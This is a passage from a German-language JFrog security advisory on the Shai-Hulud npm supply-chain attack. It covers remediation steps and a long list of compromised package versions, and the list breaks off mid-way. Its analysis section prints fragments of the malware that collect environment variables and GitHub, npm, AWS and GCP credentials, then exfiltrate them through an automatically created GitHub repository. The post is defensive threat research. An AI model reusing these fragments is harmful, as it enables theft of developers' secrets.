{"id":158527,"date":"2025-09-16T21:03:27","date_gmt":"2025-09-16T19:03:27","guid":{"rendered":"https:\/\/jfrog.com\/blog\/shai-hulud-npm-supply-chain-attack-new-compromised-packages-detected\/"},"modified":"2025-12-16T19:09:54","modified_gmt":"2025-12-16T17:09:54","slug":"shai-hulud-npm-supply-chain-attack-new-compromised-packages-detected","status":"publish","type":"post","link":"https:\/\/jfrog.com\/de\/blog\/shai-hulud-npm-supply-chain-attack-new-compromised-packages-detected\/","title":{"rendered":"Shai-Hulud npm Lieferkettenangriff \u2013 neue kompromittierte Pakete entdeckt"},"content":{"rendered":"

\"\"<\/p>\n

WICHTIGES UPDATE: Die R\u00fcckkehr von Shai-Hulud<\/strong><\/p>\n

(24. November 2025) JFrog \u00fcberwacht, analysiert und dokumentiert fortlaufend eine neue Welle der \u201eShai-Hulud\u201c Software Supply Chain Attack. Nach der ersten Kampagne sind die Threat Actors mit ausgefeilteren Taktiken zur\u00fcckgekehrt und haben weitere 796 neue Malicious Packages in f\u00fchrenden Public Registries kompromittiert.<\/p>\n

Diese neue Welle unterscheidet sich in wesentlichen Punkten von der ersten, unter anderem durch den Einsatz von Obfuscation-Techniken zur Umgehung von Detektionsmechanismen sowie durch eine verbesserte Persistenz. Diese Entwicklung unterstreicht die dringende Notwendigkeit f\u00fcr Unternehmen, proaktiver zu handeln, ihre Software Supply Chain Security sofort zu h\u00e4rten und die Vorteile eines Shift-Left-Plattform-Ansatzes zu nutzen.<\/p>\n

Eine detaillierte technische Analyse der zweiten Welle \u2013 einschlie\u00dflich vollst\u00e4ndiger IOCs und einer Aufschl\u00fcsselung des Malware-Verhaltens \u2013 finden Sie in unserem aktuellen Research Report zur Shai-Hulud npm Supply Chain Attack.<\/p>\n

\n

K\u00fcrzlich wurde das npm-\u00d6kosystem zum dritten Mal Ziel eines gro\u00df angelegten Angriffs. Nach der Kompromittierung der nx<\/i>-Pakete<\/a> und einer weiteren Welle, die popul\u00e4re<\/a> Pakete ins Visier nahm, wurde das Registry erneut attackiert.<\/p>\n

Den ersten Hinweis lieferte Daniel Pereira, der das kompromittierte<\/a> Paket @ctrl\/tinycolor@4.1.1identifizierte. Noch am selben Tag entdeckten die Malware-Scanner von JFrog 164 eindeutig b\u00f6sartige Pakete in insgesamt 338 infizierten Versionen \u2013 mit mehreren Varianten einer identischen Datenklau-Payload.<\/p>\n

Shai-Hulud Data-Stealer-Payload<\/h2>\n

Die b\u00f6sartige Payload ist in einer Datei namens bundle.js enthalten und als Webpack-Anwendung verpackt. W\u00e4hrend sie vorgibt, das System des Nutzers zu optimieren, verbirgt sich dahinter in Wahrheit eine deutlich gef\u00e4hrlichere Funktion.<\/p>\n

{\r\n  name: \"System Info App\",\r\n  version: \"1.0.0\",\r\n  description: \"Optimizes system.\"\r\n}<\/code><\/pre>\n
Anstelle einer Systemoptimierung sammelt die Anwendung zun\u00e4chst umfassende Informationen \u00fcber das System \u2013 darunter Anmeldedaten von GitHub, npm, AWS und GCP. Zus\u00e4tzlich zu den unterst\u00fctzten Plattformen l\u00e4dt sie das Open-Source-Tool TruffleHog<\/a>\u00a0herunter und f\u00fchrt es aus. Dieses durchsucht das System gezielt nach genau diesen Arten von Geheimnissen und sammelt sie.<\/p>\n
\r\nconst system_info = {\r\n        application: t.getConfig(),\r\n        system: {\r\n            platform: r.platform,\r\n            architecture: r.architecture,\r\n            platformDetailed: r.platformRaw,\r\n            architectureDetailed: r.archRaw\r\n        },\r\n        runtime: runtime_info,\r\n        environment: process.env,\r\n        modules: {\r\n            github: {\r\n                authenticated: GitHubModule.isAuthenticated(),\r\n                token: GitHubModule.getCurrentToken()\r\n            },\r\n            aws: {\r\n                secrets: ue\r\n            },\r\n            gcp: {\r\n                secrets: de\r\n            },\r\n            truffleHog: truffle_hog_dump,\r\n            npm: {\r\n                token: npm_token,\r\n                authenticated: npm_authenticated,\r\n                username: npm_user\r\n            }\r\n        }\r\n    };\r\n<\/code><\/pre>\n
Nachdem die Daten gesammelt wurden, versucht die Anwendung, sich \u00fcber das bestehende Benutzerkonto zu authentifizieren. Im Erfolgsfall erstellt sie ein Repository mit dem Namen Shai-Hulud<\/b>, in dem die gestohlenen Inhalte mehrfach base64-codiert abgelegt werden.<\/p>\n
\r\nasync makeRepo(t, r) {\r\n        const n = (await this.octokit.rest.repos.createForAuthenticatedUser({\r\n            name: t,\r\n            description: \"Shai-Hulud Repository.\",\r\n            private: !0,\r\n        })).data;\r\n        return await new Promise(t => setTimeout(t, 3e3)), r && await this.octokit.rest.repos.createOrUpdateFileContents({\r\n            path: \"data.json\",\r\n            message: \"Initial commit\",\r\n            content: Buffer.from(Buffer.from(Buffer.from(r).toString(\"base64\")).toString(\"base64\")).toString(\"base64\")\r\n        })\r\n}\r\n\r\n\r\nif GitHubModule.isAuthenticated() & ! GitHubModule.repoExists(\"Shai-Hulud\") {\r\n   await GitHubModule.makeRepo(\"Shai-Hulud\", formatOutput(pe)\r\n   exitWithCode(0)\r\n}\r\n<\/code><\/pre>\n
\"\"<\/p>\n
Wir haben acht Varianten der oben beschriebenen Payload beobachtet. Zwar bleibt die Hauptfunktionalit\u00e4t gleich, jedoch weisen einige Versionen leichte Unterschiede auf \u2013 was auf schrittweise Anpassungen durch den Angreifer im Verlauf der Kampagne hindeutet.<\/p>\n
Beispielsweise setzen einige Versionen das \u201eShai-Hulud<\/b>\u201c-Repository auf privat, um es der Entdeckung zu entziehen. Eine andere Variante versucht zus\u00e4tzlich zu den bereits erw\u00e4hnten Zugangsdaten auch Azure-Credentials <\/b>zu stehlen.<\/p>\n
Was sollten betroffene Nutzer tun?<\/h1>\n
Wenn Sie eines der unter \u201eKompromittierte Pakete\u201c aufgelisteten Pakete installiert haben, besteht die M\u00f6glichkeit, dass die b\u00f6sartige Payload sensible Informationen von Ihrem System exfiltriert hat.<\/p>\n
F\u00fchren Sie in diesem Fall die folgenden Ma\u00dfnahmen durch:<\/p>\n
    \n
  1. Rotieren Sie alle Zugriffstokens<\/b>, die auf dem betroffenen System gespeichert waren \u2013 insbesondere von GitHub, npm, AWS, GCP<\/b> und Azure<\/b>.<\/li>\n
  2. Rotieren Sie auch alle Zugriffstokens<\/b>, die durch TruffleHog identifiziert werden k\u00f6nnen. Eine Liste der unterst\u00fctzten Anbieter finden Sie im GitHub-Repository von TruffleHog<\/a>.<\/li>\n<\/ol>\n
    Info:<\/strong> Um Ihre Software-Lieferkette proaktiv zu sch\u00fctzen, empfehlen wir den Einsatz von JFrog Curation<\/a>. Diese L\u00f6sung blockiert riskante oder b\u00f6sartige Open-Source-Pakete bereits, bevor sie in Ihre Lieferkette gelangen. Mehr erfahren Sie bei einer Demo \u2013 vereinbaren Sie jetzt einen Termin<\/a>.<\/div>\n
    Wer steckt hinter dem Angriff?<\/h2>\n
    Die Nutzung von GitHub-Repositories zur Speicherung gestohlener Daten erinnert an die beim NX CLI-Angriff <\/b>eingesetzten Techniken. Dennoch reicht diese \u00c4hnlichkeit nicht aus, um sicher festzustellen, ob beide Vorf\u00e4lle demselben Angreifer zuzuordnen sind.<\/p>\n
    Zwar weisen Tooling<\/b> und Payload-Design<\/b> gewisse Parallelen auf, eine eindeutige Attribution ist jedoch bislang nicht m\u00f6glich.<\/p>\n
    Kompromittierte Pakete<\/h2>\n
    Urspr\u00fcnglicher Bericht<\/h3>\n
    Im urspr\u00fcnglichen Bericht wurden die folgenden kompromittierten Paketversionen genannt:<\/p>\n
    angulartics2@14.1.2<\/p>\n
    @ctrl\/deluge@7.2.2<\/p>\n
    @ctrl\/golang-template@1.4.3<\/p>\n
    @ctrl\/magnet-link@4.0.4<\/p>\n
    @ctrl\/ngx-codemirror@7.0.2<\/p>\n
    @ctrl\/ngx-csv@6.0.2<\/p>\n
    @ctrl\/ngx-emoji-mart@9.2.2<\/p>\n
    @ctrl\/ngx-rightclick@4.0.2<\/p>\n
    @ctrl\/qbittorrent@9.7.2<\/p>\n
    @ctrl\/react-adsense@2.0.2<\/p>\n
    @ctrl\/shared-torrent@6.3.2<\/p>\n
    @ctrl\/tinycolor@4.1.1, @4.1.2<\/p>\n
    @ctrl\/torrent-file@4.1.2<\/p>\n
    @ctrl\/transmission@7.3.1<\/p>\n
    @ctrl\/ts-base32@4.0.2<\/p>\n
    encounter-playground@0.0.5<\/p>\n
    json-rules-engine-simplified@0.2.4, 0.2.1<\/p>\n
    koa2-swagger-ui@5.11.2, 5.11.1<\/p>\n
    @nativescript-community\/gesturehandler@2.0.35<\/p>\n
    @nativescript-community\/sentry 4.6.43<\/p>\n
    @nativescript-community\/text@1.6.13<\/p>\n
    @nativescript-community\/ui-collectionview@6.0.6<\/p>\n
    @nativescript-community\/ui-drawer@0.1.30<\/p>\n
    @nativescript-community\/ui-image@4.5.6<\/p>\n
    @nativescript-community\/ui-material-bottomsheet@7.2.72<\/p>\n
    @nativescript-community\/ui-material-core@7.2.76<\/p>\n
    @nativescript-community\/ui-material-core-tabs@7.2.76<\/p>\n
    ngx-color@10.0.2<\/p>\n
    ngx-toastr@19.0.2<\/p>\n
    ngx-trend@8.0.1<\/p>\n
    react-complaint-image@0.0.35<\/p>\n
    react-jsonschema-form-conditionals@0.3.21<\/p>\n
    react-jsonschema-form-extras@1.0.4<\/p>\n
    rxnt-authentication@0.0.6<\/p>\n
    rxnt-healthchecks-nestjs@1.0.5<\/p>\n
    rxnt-kue@1.0.7<\/p>\n
    swc-plugin-component-annotate@1.9.2<\/p>\n
    ts-gaussian@3.0.6<\/p>\n
    (Laufend) neu entdeckte kompromittierte Pakete<\/h3>\n
    Wir beobachten weiterhin die fortschreitende Kompromittierung weiterer Pakete im Rahmen dieser Kampagne. Unsere Monitoring-Infrastruktur hat zus\u00e4tzliche b\u00f6sartige Pakete identifiziert, die dieselbe Payload \u2013 oder Varianten davon \u2013 enthalten. Diese wurden in Hunderten von Versionen <\/b>ver\u00f6ffentlicht:<\/p>\n
    @ahmedhfarag\/ngx-perfect-scrollbar@20.0.20
    \n@ahmedhfarag\/ngx-virtual-scroller@4.0.4
    \n@art-ws\/common@2.0.22
    \n@art-ws\/common@2.0.28
    \n@art-ws\/config-eslint@2.0.4
    \n@art-ws\/config-eslint@2.0.5
    \n@art-ws\/config-ts@2.0.7
    \n@art-ws\/config-ts@2.0.8
    \n@art-ws\/db-context@2.0.21
    \n@art-ws\/db-context@2.0.24
    \n@art-ws\/di@2.0.28
    \n@art-ws\/di@2.0.32
    \n@art-ws\/di-node@2.0.13
    \n@art-ws\/eslint@1.0.5
    \n@art-ws\/eslint@1.0.6
    \n@art-ws\/fastify-http-server@2.0.24
    \n@art-ws\/fastify-http-server@2.0.27
    \n@art-ws\/http-server@2.0.21
    \n@art-ws\/http-server@2.0.25
    \n@art-ws\/openapi@0.1.12
    \n@art-ws\/openapi@0.1.9
    \n@art-ws\/package-base@1.0.5
    \n@art-ws\/package-base@1.0.6
    \n@art-ws\/prettier@1.0.5
    \n@art-ws\/prettier@1.0.6
    \n@art-ws\/slf@2.0.15
    \n@art-ws\/slf@2.0.22
    \n@art-ws\/ssl-info@1.0.10
    \n@art-ws\/ssl-info@1.0.9
    \n@art-ws\/web-app@1.0.3
    \n@art-ws\/web-app@1.0.4
    \n@basic-ui-components-stc\/basic-ui-components@1.0.5
    \n@crowdstrike\/commitlint@8.1.1
    \n@crowdstrike\/commitlint@8.1.2
    \n@crowdstrike\/falcon-shoelace@0.4.1
    \n@crowdstrike\/falcon-shoelace@0.4.2
    \n@crowdstrike\/foundry-js@0.19.1
    \n@crowdstrike\/foundry-js@0.19.2
    \n@crowdstrike\/glide-core@0.34.2
    \n@crowdstrike\/glide-core@0.34.3
    \n@crowdstrike\/logscale-dashboard@1.205.1
    \n@crowdstrike\/logscale-dashboard@1.205.2
    \n@crowdstrike\/logscale-file-editor@1.205.1
    \n@crowdstrike\/logscale-file-editor@1.205.2
    \n@crowdstrike\/logscale-parser-edit@1.205.1
    \n@crowdstrike\/logscale-parser-edit@1.205.2
    \n@crowdstrike\/logscale-search@1.205.1
    \n@crowdstrike\/logscale-search@1.205.2
    \n@crowdstrike\/tailwind-toucan-base@5.0.1
    \n@crowdstrike\/tailwind-toucan-base@5.0.2
    \n@ctrl\/deluge@7.2.1
    \n@ctrl\/golang-template@1.4.2
    \n@ctrl\/magnet-link@4.0.3
    \n@ctrl\/ngx-codemirror@7.0.1
    \n@ctrl\/ngx-csv@6.0.1
    \n@ctrl\/ngx-emoji-mart@9.2.1
    \n@ctrl\/ngx-rightclick@4.0.1
    \n@ctrl\/qbittorrent@9.7.1
    \n@ctrl\/react-adsense@2.0.1
    \n@ctrl\/shared-torrent@6.3.1
    \n@ctrl\/tinycolor@4.1.1
    \n@ctrl\/tinycolor@4.1.2
    \n@ctrl\/torrent-file@4.1.1
    \n@ctrl\/ts-base32@4.0.1
    \n@hestjs\/core@0.2.1
    \n@hestjs\/cqrs@0.1.6
    \n@hestjs\/demo@0.1.2
    \n@hestjs\/eslint-config@0.1.2
    \n@hestjs\/logger@0.1.6
    \n@hestjs\/scalar@0.1.7
    \n@hestjs\/validation@0.1.6
    \n@nativescript-community\/arraybuffers@1.1.6
    \n@nativescript-community\/arraybuffers@1.1.7
    \n@nativescript-community\/arraybuffers@1.1.8
    \n@nativescript-community\/perms@3.0.5
    \n@nativescript-community\/perms@3.0.6
    \n@nativescript-community\/perms@3.0.7
    \n@nativescript-community\/perms@3.0.8
    \n@nativescript-community\/perms@3.0.9
    \n@nativescript-community\/sentry@4.6.43
    \n@nativescript-community\/sqlite@3.5.3
    \n@nativescript-community\/sqlite@3.5.4
    \n@nativescript-community\/sqlite@3.5.5
    \n@nativescript-community\/text@1.6.10
    \n@nativescript-community\/text@1.6.11
    \n@nativescript-community\/text@1.6.12
    \n@nativescript-community\/text@1.6.9
    \n@nativescript-community\/typeorm@0.2.30
    \n@nativescript-community\/typeorm@0.2.31
    \n@nativescript-community\/typeorm@0.2.32
    \n@nativescript-community\/typeorm@0.2.33
    \n@nativescript-community\/ui-document-picker@1.1.27
    \n@nativescript-community\/ui-document-picker@1.1.28
    \n@nativescript-community\/ui-label@1.3.35
    \n@nativescript-community\/ui-label@1.3.36
    \n@nativescript-community\/ui-label@1.3.37
    \n@nativescript-community\/ui-material-bottom-navigation@7.2.72
    \n@nativescript-community\/ui-material-bottom-navigation@7.2.73
    \n@nativescript-community\/ui-material-bottom-navigation@7.2.74
    \n@nativescript-community\/ui-material-bottom-navigation@7.2.75
    \n@nativescript-community\/ui-material-core@7.2.72
    \n@nativescript-community\/ui-material-core@7.2.73
    \n@nativescript-community\/ui-material-core@7.2.74
    \n@nativescript-community\/ui-material-core@7.2.75
    \n@nativescript-community\/ui-material-core-tabs@7.2.72
    \n@nativescript-community\/ui-material-core-tabs@7.2.73
    \n@nativescript-community\/ui-material-core-tabs@7.2.74
    \n@nativescript-community\/ui-material-core-tabs@7.2.75
    \n@nativescript-community\/ui-material-ripple@7.2.72
    \n@nativescript-community\/ui-material-ripple@7.2.73
    \n@nativescript-community\/ui-material-ripple@7.2.74
    \n@nativescript-community\/ui-material-ripple@7.2.75
    \n@nativescript-community\/ui-material-tabs@7.2.72
    \n@nativescript-community\/ui-material-tabs@7.2.73
    \n@nativescript-community\/ui-material-tabs@7.2.74
    \n@nativescript-community\/ui-material-tabs@7.2.75
    \n@nativescript-community\/ui-pager@14.1.35
    \n@nativescript-community\/ui-pager@14.1.36
    \n@nativescript-community\/ui-pager@14.1.37
    \n@nativescript-community\/ui-pager@14.1.38
    \n@nativescript-community\/ui-pulltorefresh@2.5.4
    \n@nativescript-community\/ui-pulltorefresh@2.5.5
    \n@nativescript-community\/ui-pulltorefresh@2.5.6
    \n@nativescript-community\/ui-pulltorefresh@2.5.7
    \n@nexe\/config-manager@0.1.1
    \n@nexe\/eslint-config@0.1.1
    \n@nexe\/logger@0.1.3
    \n@nstudio\/angular@20.0.4
    \n@nstudio\/angular@20.0.5
    \n@nstudio\/angular@20.0.6
    \n@nstudio\/focus@20.0.4
    \n@nstudio\/focus@20.0.5
    \n@nstudio\/focus@20.0.6
    \n@nstudio\/nativescript-checkbox@2.0.6
    \n@nstudio\/nativescript-checkbox@2.0.7
    \n@nstudio\/nativescript-checkbox@2.0.8
    \n@nstudio\/nativescript-checkbox@2.0.9
    \n@nstudio\/nativescript-loading-indicator@5.0.1
    \n@nstudio\/nativescript-loading-indicator@5.0.2
    \n@nstudio\/nativescript-loading-indicator@5.0.3
    \n@nstudio\/nativescript-loading-indicator@5.0.4
    \n@nstudio\/ui-collectionview@5.1.11
    \n@nstudio\/ui-collectionview@5.1.12
    \n@nstudio\/ui-collectionview@5.1.13
    \n@nstudio\/ui-collectionview@5.1.14
    \n@nstudio\/web@20.0.4
    \n@nstudio\/web-angular@20.0.4
    \n@nstudio\/xplat@20.0.4
    \n@nstudio\/xplat@20.0.5
    \n@nstudio\/xplat@20.0.6
    \n@nstudio\/xplat@20.0.7
    \n@nstudio\/xplat-utils@20.0.4
    \n@nstudio\/xplat-utils@20.0.5
    \n@nstudio\/xplat-utils@20.0.6
    \n@nstudio\/xplat-utils@20.0.7
    \n@operato\/board@9.0.35
    \n@operato\/board@9.0.36
    \n@operato\/board@9.0.37
    \n@operato\/board@9.0.38
    \n@operato\/board@9.0.39
    \n@operato\/board@9.0.40
    \n@operato\/board@9.0.41
    \n@operato\/board@9.0.42
    \n@operato\/board@9.0.43
    \n@operato\/board@9.0.44
    \n@operato\/board@9.0.45
    \n@operato\/board@9.0.46
    \n@operato\/board@9.0.47
    \n@operato\/board@9.0.48
    \n@operato\/board@9.0.49
    \n@operato\/board@9.0.50
    \n@operato\/board@9.0.51
    \n@operato\/data-grist@9.0.29
    \n@operato\/data-grist@9.0.35
    \n@operato\/data-grist@9.0.36
    \n@operato\/data-grist@9.0.37
    \n@operato\/graphql@9.0.22
    \n@operato\/graphql@9.0.35
    \n@operato\/graphql@9.0.36
    \n@operato\/graphql@9.0.37
    \n@operato\/graphql@9.0.38
    \n@operato\/graphql@9.0.39
    \n@operato\/graphql@9.0.40
    \n@operato\/graphql@9.0.41
    \n@operato\/graphql@9.0.42
    \n@operato\/graphql@9.0.43
    \n@operato\/graphql@9.0.44
    \n@operato\/graphql@9.0.45
    \n@operato\/graphql@9.0.46
    \n@operato\/graphql@9.0.47
    \n@operato\/graphql@9.0.48
    \n@operato\/graphql@9.0.49
    \n@operato\/graphql@9.0.50
    \n@operato\/graphql@9.0.51
    \n@operato\/headroom@9.0.2
    \n@operato\/headroom@9.0.35
    \n@operato\/headroom@9.0.36
    \n@operato\/headroom@9.0.37
    \n@operato\/help@9.0.35
    \n@operato\/help@9.0.36
    \n@operato\/help@9.0.37
    \n@operato\/help@9.0.38
    \n@operato\/help@9.0.39
    \n@operato\/help@9.0.40
    \n@operato\/help@9.0.41
    \n@operato\/help@9.0.42
    \n@operato\/help@9.0.43
    \n@operato\/help@9.0.44
    \n@operato\/help@9.0.45
    \n@operato\/help@9.0.46
    \n@operato\/help@9.0.47
    \n@operato\/help@9.0.48
    \n@operato\/help@9.0.49
    \n@operato\/help@9.0.50
    \n@operato\/help@9.0.51
    \n@operato\/i18n@9.0.35
    \n@operato\/i18n@9.0.36
    \n@operato\/i18n@9.0.37
    \n@operato\/input@9.0.35
    \n@operato\/input@9.0.36
    \n@operato\/input@9.0.37
    \n@operato\/input@9.0.38
    \n@operato\/input@9.0.39
    \n@operato\/input@9.0.40
    \n@operato\/input@9.0.41
    \n@operato\/input@9.0.42
    \n@operato\/input@9.0.43
    \n@operato\/input@9.0.44
    \n@operato\/input@9.0.45
    \n@operato\/input@9.0.46
    \n@operato\/input@9.0.47
    \n@operato\/input@9.0.48
    \n@operato\/layout@9.0.35
    \n@operato\/layout@9.0.37
    \n@operato\/popup@9.0.35
    \n@operato\/popup@9.0.36
    \n@operato\/popup@9.0.37
    \n@operato\/popup@9.0.38
    \n@operato\/popup@9.0.39
    \n@operato\/popup@9.0.40
    \n@operato\/popup@9.0.41
    \n@operato\/popup@9.0.42
    \n@operato\/popup@9.0.43
    \n@operato\/popup@9.0.44
    \n@operato\/popup@9.0.45
    \n@operato\/popup@9.0.46
    \n@operato\/popup@9.0.47
    \n@operato\/popup@9.0.48
    \n@operato\/popup@9.0.49
    \n@operato\/popup@9.0.50
    \n@operato\/popup@9.0.51
    \n@operato\/pull-to-refresh@9.0.35
    \n@operato\/pull-to-refresh@9.0.36
    \n@operato\/pull-to-refresh@9.0.37
    \n@operato\/pull-to-refresh@9.0.38
    \n@operato\/pull-to-refresh@9.0.39
    \n@operato\/pull-to-refresh@9.0.40
    \n@operato\/pull-to-refresh@9.0.41
    \n@operato\/pull-to-refresh@9.0.42
    \n@operato\/pull-to-refresh@9.0.43
    \n@operato\/pull-to-refresh@9.0.44
    \n@operato\/pull-to-refresh@9.0.45
    \n@operato\/pull-to-refresh@9.0.46
    \n@operato\/pull-to-refresh@9.0.47
    \n@operato\/shell@9.0.22
    \n@operato\/shell@9.0.35
    \n@operato\/shell@9.0.36
    \n@operato\/shell@9.0.37
    \n@operato\/shell@9.0.38
    \n@operato\/shell@9.0.39
    \n@operato\/styles@9.0.2
    \n@operato\/styles@9.0.35
    \n@operato\/styles@9.0.36
    \n@operato\/styles@9.0.37
    \n@operato\/utils@9.0.22
    \n@operato\/utils@9.0.35
    \n@operato\/utils@9.0.36
    \n@operato\/utils@9.0.37
    \n@operato\/utils@9.0.38
    \n@operato\/utils@9.0.39
    \n@operato\/utils@9.0.40
    \n@operato\/utils@9.0.41
    \n@operato\/utils@9.0.42
    \n@operato\/utils@9.0.43
    \n@operato\/utils@9.0.44
    \n@operato\/utils@9.0.45
    \n@operato\/utils@9.0.46
    \n@operato\/utils@9.0.47
    \n@operato\/utils@9.0.48
    \n@operato\/utils@9.0.49
    \n@operato\/utils@9.0.50
    \n@operato\/utils@9.0.51
    \n@teselagen\/bio-parsers@0.4.29
    \n@teselagen\/bio-parsers@0.4.30
    \n@teselagen\/bounce-loader@0.3.16
    \n@teselagen\/bounce-loader@0.3.17
    \n@teselagen\/file-utils@0.3.21
    \n@teselagen\/file-utils@0.3.22
    \n@teselagen\/liquibase-tools@0.4.1
    \n@teselagen\/ove@0.7.39
    \n@teselagen\/ove@0.7.40
    \n@teselagen\/range-utils@0.3.14
    \n@teselagen\/range-utils@0.3.15
    \n@teselagen\/react-list@0.8.19
    \n@teselagen\/react-list@0.8.20
    \n@teselagen\/react-table@6.10.19
    \n@teselagen\/react-table@6.10.20
    \n@teselagen\/react-table@6.10.21
    \n@teselagen\/react-table@6.10.22
    \n@teselagen\/sequence-utils@0.3.33
    \n@teselagen\/sequence-utils@0.3.34
    \n@teselagen\/ui@0.9.10
    \n@teselagen\/ui@0.9.9
    \n@thangved\/callback-window@1.1.4
    \n@things-factory\/attachment-base@9.0.42
    \n@things-factory\/attachment-base@9.0.43
    \n@things-factory\/attachment-base@9.0.44
    \n@things-factory\/attachment-base@9.0.45
    \n@things-factory\/attachment-base@9.0.46
    \n@things-factory\/attachment-base@9.0.47
    \n@things-factory\/attachment-base@9.0.48
    \n@things-factory\/attachment-base@9.0.49
    \n@things-factory\/attachment-base@9.0.50
    \n@things-factory\/attachment-base@9.0.51
    \n@things-factory\/attachment-base@9.0.52
    \n@things-factory\/attachment-base@9.0.53
    \n@things-factory\/attachment-base@9.0.54
    \n@things-factory\/attachment-base@9.0.55
    \n@things-factory\/auth-base@9.0.42
    \n@things-factory\/auth-base@9.0.43
    \n@things-factory\/auth-base@9.0.44
    \n@things-factory\/auth-base@9.0.45
    \n@things-factory\/email-base@9.0.42
    \n@things-factory\/email-base@9.0.43
    \n@things-factory\/email-base@9.0.44
    \n@things-factory\/email-base@9.0.45
    \n@things-factory\/email-base@9.0.46
    \n@things-factory\/email-base@9.0.47
    \n@things-factory\/email-base@9.0.48
    \n@things-factory\/email-base@9.0.49
    \n@things-factory\/email-base@9.0.50
    \n@things-factory\/email-base@9.0.51
    \n@things-factory\/email-base@9.0.52
    \n@things-factory\/email-base@9.0.53
    \n@things-factory\/email-base@9.0.54
    \n@things-factory\/email-base@9.0.55
    \n@things-factory\/email-base@9.0.56
    \n@things-factory\/email-base@9.0.57
    \n@things-factory\/email-base@9.0.58
    \n@things-factory\/email-base@9.0.59
    \n@things-factory\/env@9.0.42
    \n@things-factory\/env@9.0.43
    \n@things-factory\/env@9.0.44
    \n@things-factory\/env@9.0.45
    \n@things-factory\/integration-base@9.0.42
    \n@things-factory\/integration-base@9.0.43
    \n@things-factory\/integration-base@9.0.44
    \n@things-factory\/integration-base@9.0.45
    \n@things-factory\/integration-marketplace@9.0.42
    \n@things-factory\/integration-marketplace@9.0.43
    \n@things-factory\/integration-marketplace@9.0.44
    \n@things-factory\/integration-marketplace@9.0.45
    \n@things-factory\/shell@9.0.42
    \n@things-factory\/shell@9.0.43
    \n@things-factory\/shell@9.0.44
    \n@things-factory\/shell@9.0.45
    \n@tnf-dev\/api@1.0.8
    \n@tnf-dev\/core@1.0.8
    \n@tnf-dev\/js@1.0.8
    \n@tnf-dev\/mui@1.0.8
    \n@tnf-dev\/react@1.0.8
    \n@ui-ux-gang\/devextreme-angular-rpk@24.1.7
    \n@ui-ux-gang\/devextreme-rpk@24.1.7
    \n@yoobic\/design-system@6.5.17
    \n@yoobic\/jpeg-camera-es6@1.0.13
    \n@yoobic\/yobi@8.7.53
    \nace-colorpicker-rpk@0.0.14
    \nairchief@0.3.1
    \nairpilot@0.8.8
    \nangulartics2@14.1.1
    \nbrowser-webdriver-downloader@3.0.8
    \ncapacitor-notificationhandler@0.0.2
    \ncapacitor-notificationhandler@0.0.3
    \ncapacitor-plugin-healthapp@0.0.2
    \ncapacitor-plugin-healthapp@0.0.3
    \ncapacitor-plugin-ihealth@1.1.8
    \ncapacitor-plugin-ihealth@1.1.9
    \ncapacitor-plugin-vonage@1.0.2
    \ncapacitor-plugin-vonage@1.0.3
    \ncapacitorandroidpermissions@0.0.4
    \ncapacitorandroidpermissions@0.0.5
    \nconfig-cordova@0.8.5
    \ncordova-plugin-voxeet2@1.0.24
    \ncordova-voxeet@1.0.32
    \ncreate-hest-app@0.1.9
    \ndb-evo@1.1.4
    \ndb-evo@1.1.5
    \ndevextreme-angular-rpk@21.2.8
    \ndevextreme-rpk@21.2.8
    \nember-browser-services@5.0.2
    \nember-browser-services@5.0.3
    \nember-headless-form@1.1.2
    \nember-headless-form@1.1.3
    \nember-headless-form-yup@1.0.1
    \nember-headless-table@2.1.5
    \nember-headless-table@2.1.6
    \nember-url-hash-polyfill@1.0.12
    \nember-url-hash-polyfill@1.0.13
    \nember-velcro@2.2.1
    \nember-velcro@2.2.2
    \nencounter-playground@0.0.2
    \nencounter-playground@0.0.3
    \nencounter-playground@0.0.4
    \neslint-config-crowdstrike@11.0.2
    \neslint-config-crowdstrike@11.0.3
    \neslint-config-crowdstrike-node@4.0.3
    \neslint-config-crowdstrike-node@4.0.4
    \neslint-config-teselagen@6.1.7
    \neslint-config-teselagen@6.1.8
    \nglobalize-rpk@1.7.4
    \ngraphql-sequelize-teselagen@5.3.8
    \ngraphql-sequelize-teselagen@5.3.9
    \nhtml-to-base64-image@1.0.2
    \njson-rules-engine-simplified@0.2.1
    \njson-rules-engine-simplified@0.2.2
    \njson-rules-engine-simplified@0.2.3
    \njson-rules-engine-simplified@0.2.4
    \njumpgate@0.0.2
    \nkoa2-swagger-ui@5.11.1
    \nkoa2-swagger-ui@5.11.2
    \nmcfly-semantic-release@1.3.1
    \nmcp-knowledge-base@0.0.2
    \nmcp-knowledge-graph@1.2.1
    \nmobioffice-cli@1.0.3
    \nmonorepo-next@13.0.1
    \nmonorepo-next@13.0.2
    \nmstate-angular@0.4.4
    \nmstate-cli@0.4.7
    \nmstate-dev-react@1.1.1
    \nmstate-react@1.6.5
    \nng-imports-checker@0.0.10
    \nng-imports-checker@0.0.9
    \nng2-file-upload@7.0.2
    \nng2-file-upload@8.0.1
    \nng2-file-upload@8.0.2
    \nng2-file-upload@8.0.3
    \nng2-file-upload@9.0.1
    \nngx-bootstrap@18.1.4
    \nngx-bootstrap@19.0.3
    \nngx-bootstrap@19.0.4
    \nngx-bootstrap@20.0.3
    \nngx-bootstrap@20.0.4
    \nngx-bootstrap@20.0.5
    \nngx-bootstrap@20.0.6
    \nngx-color@10.0.1
    \nngx-toastr@19.0.1
    \nngx-ws@1.1.5
    \nngx-ws@1.1.6
    \noradm-to-gql@35.0.14
    \noradm-to-gql@35.0.15
    \noradm-to-sqlz@1.1.2
    \noradm-to-sqlz@1.1.3
    \noradm-to-sqlz@1.1.4
    \noradm-to-sqlz@1.1.5
    \nove-auto-annotate@0.0.10
    \nove-auto-annotate@0.0.9
    \npm2-gelf-json@1.0.4
    \npm2-gelf-json@1.0.5
    \nprintjs-rpk@1.6.1
    \nreact-complaint-image@0.0.32
    \nreact-complaint-image@0.0.33
    \nreact-complaint-image@0.0.34
    \nreact-jsonschema-form-conditionals@0.3.18
    \nreact-jsonschema-form-conditionals@0.3.19
    \nreact-jsonschema-form-conditionals@0.3.20
    \nreact-jsonschema-form-extras@1.0.1
    \nreact-jsonschema-form-extras@1.0.2
    \nreact-jsonschema-form-extras@1.0.3
    \nreact-jsonschema-rxnt-extras@0.4.6
    \nreact-jsonschema-rxnt-extras@0.4.7
    \nreact-jsonschema-rxnt-extras@0.4.8
    \nreact-jsonschema-rxnt-extras@0.4.9
    \nremark-preset-lint-crowdstrike@4.0.1
    \nremark-preset-lint-crowdstrike@4.0.2
    \nrxnt-authentication@0.0.3
    \nrxnt-authentication@0.0.4
    \nrxnt-authentication@0.0.5
    \nrxnt-healthchecks-nestjs@1.0.2
    \nrxnt-healthchecks-nestjs@1.0.3
